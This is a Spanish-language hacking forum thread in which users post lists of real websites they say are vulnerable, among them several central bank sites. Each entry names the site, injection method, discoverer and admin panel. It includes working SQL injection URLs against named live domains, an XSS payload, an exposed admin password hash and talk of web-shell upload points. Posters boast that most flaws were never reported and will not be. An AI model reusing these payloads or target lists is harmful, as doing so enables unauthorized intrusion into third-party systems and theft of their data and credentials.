Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]

Panel: No buscado

Descubridor: Enigmatico.

Comentarios: No reportado.


Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]

[Enlace externo eliminado para invitados]

Descubridor: Er MichyBukana
no me permitía utilizar el < por lo que no pude hacer un XSS mas gracioso jeje.

Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Web:

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]

=============================================

Bug:

[Enlace externo eliminado para invitados] ... ----c:(web encontrada pass:aa844643126fb6fedcd012933b4ae494 login;admin. panel--C:[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados] ... ----c:(web con 3 bases de datos y se encontro el el user y pass pero no se pudo decifrar)
[Enlace externo eliminado para invitados] ... -C:(tablas encontradas pero hash no se puede crackear)
[Enlace externo eliminado para invitados] ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
[Enlace externo eliminado para invitados] ... ----c:(web con todas las tablas pero no se encontro el login ni las pass..)
[Enlace externo eliminado para invitados] ... ----c:(web con todas las tablas pero ninguna interesante.)
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]? ... ---------C: sacadas todas las tablas menos las del admin..!
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados] ... ?EventID='
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados] ... ,5,6,7,8--
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados] ... ,1,2,3,4,5
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'
[Enlace externo eliminado para invitados]'

=============================================
Metodo:
SQL,XSS
=============================================
Descubridor:
CyRuX
=============================================
Comentarios:
Ninguna fue reportado..!¬¬
pero todas esta con los datos necesario. Login: y Pass:
algunas tienen uplaod para la introduccion de 1 web-Shell
http://Corp-51.net --->RIP 2010-2014
Firma eliminada por spam. .l.
Blog: www.blackophn.blogspot.com
Imagen
wow !! eres un Maniaco CyRuX jajaj nada solo una Pequeña Broma Muy Buen Aporte CyRuX BUeno aki vamos :

Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]%

Panel: [Enlace externo eliminado para invitados]

Descubridor: rhector123

Metodo: SQL

Comentarios: Bueno reportado 5 veces sin respuestas Por eso lo hago Publico

otra cosa mas hay un bug mas, se puede saltar el logeo xD del admin
el administrador deberia poner mas interes en su seguridad xD bueno eso es todo.

un saludo Atte By rhector123
"Aquel que tú crees que ha muerto, no ha hecho más que adelantarse en el camino."

Atte By rhector123
Web:
[Enlace externo eliminado para invitados]
Bug:

Código: Seleccionar todo

http://www.estrellasorientales.com.do/noticias.php?id=-1+union+select+all+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7+from+information_schema.tables--
Panel:
[Enlace externo eliminado para invitados]
Metodo:
SQL

Comentario:
No se ah reportado..! pondria los datos del admin
pero creo que seria demasiado..!

Network:iranserv Server
rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
http://Corp-51.net --->RIP 2010-2014
Firma eliminada por spam. .l.
Blog: www.blackophn.blogspot.com
Imagen
WEB:
[Enlace externo eliminado para invitados]

BUG:

Código: Seleccionar todo

http://www.cac-acc.org/news.php?id=-1+union+select+1,replace%28group_concat%28table_name%29,0x2C,0x3C62723E%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
Panel:
NO encontrado..!

Metodo:
SQL!

Descubridor:
CyRuX

Comentario:
No reportado..! Ni pienso hacerlo..!¬¬

=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
Network:iranserv Server:rc.iranserv.com
Channel : #iberoamerica
#Anonymous
#Honduras
http://Corp-51.net --->RIP 2010-2014
Firma eliminada por spam. .l.
Blog: www.blackophn.blogspot.com
Imagen
Para practicar en que lo desee

Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]

Panel: No buscado Database name joedb

Descubridor: zeokat

Metodo: SQL

Comentarios: Pagina oficial de este musico, la verdad es que no lo he reportado
Un site de esos porno free

Web: [Enlace externo eliminado para invitados]

Bug: [Enlace externo eliminado para invitados]

Panel: No buscado ; Database name swork

Descubridor: zeokat

Metodo: SQL

Comentarios: Es un server dedicado, asi que no da acceso a otro site
Banco de rusia:
[Enlace externo eliminado para invitados]( =notes_coins/base_of_memora‚ble_coins/e_coins1.asp?cat_‚num=5216-0060

Metodo: Asp Injection
1337 & culture!
Banco central de bahrain:

[Enlace externo eliminado para invitados] 4page.php?page=sitemap
1337 & culture!
Banco de Blangadesh:

[Enlace externo eliminado para invitados]( >org/aboutus/dept/dept_deta‚ils.php?callfrom=tababoutus‚&dept_id=74

PD: tiene errores logicos, y muy obvios para uqe no metan las manos donde no los kiddies!
1337 & culture!
Banco de Bolivia:

[Enlace externo eliminado para invitados] 8.php?q=institucional/estad‚os_financieros&button2=Busc‚ar&mes=2011

Metodo: SQL Injection
Última edición por KHC el 10 Oct 2011, 04:16, editado 1 vez en total.
1337 & culture!
Banco de Cambodia:

[Enlace externo eliminado para invitados] 9cations.asp?tp=a

Metodo: Asp Injection
1337 & culture!
Banco Central de iraq:

[Enlace externo eliminado para invitados] ?pid=%22%3E%3Ca%20href=%22‚http://google.com%22%3EBe%2‚0Happy,%20click%20here%3C/h 1%3E
1337 & culture!

Volver a “Auditoria Web”